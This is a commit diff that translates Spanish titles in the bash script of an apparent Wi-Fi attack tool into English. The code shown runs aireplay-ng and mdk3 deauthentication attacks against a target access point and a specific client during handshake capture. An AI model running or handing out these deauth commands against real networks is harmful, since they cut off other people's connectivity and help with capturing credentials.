translate deauth titles

This commit is contained in:
strasharo 2016-03-18 02:25:24 +02:00
parent 6ef2e1a267
commit ef73ad35e2
1 changed files with 4 additions and 4 deletions

View File

@ -15,7 +15,7 @@ clear
##################################### < CONFIGURATION > ##################################### ##################################### < CONFIGURATION > #####################################
DUMP_PATH="/tmp/TMPflux" DUMP_PATH="/tmp/TMPflux"
# Number de desautentificaciones # Deauth duration during handshake capture
DEAUTHTIME="30" DEAUTHTIME="30"
revision=1 revision=1
version=0.19 version=0.19
@ -2908,13 +2908,13 @@ function handshakecheck {
# Deauth all # Deauth all
function deauthall { function deauthall {
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a todos de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR & xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC --ignore-negative-one $WIFI_MONITOR &
} }
function deauthmdk3 { function deauthmdk3 {
echo "$Host_MAC" >$DUMP_PATH/mdk3.txt echo "$Host_MAC" >$DUMP_PATH/mdk3.txt
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando mdk3 a todos de $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating via mdk3 all clients on $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN &
mdk3PID=$! mdk3PID=$!
sleep 15 sleep 15
kill $mdk3PID &>$flux_output_device kill $mdk3PID &>$flux_output_device
@ -2924,7 +2924,7 @@ function deauthmdk3 {
function deauthesp { function deauthesp {
sleep 2 sleep 2
xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Desautenticando a $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR & xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating client $Client_MAC" -e aireplay-ng -0 $DEAUTHTIME -a $Host_MAC -c $Client_MAC --ignore-negative-one $WIFI_MONITOR &
} }
# Close all processes # Close all processes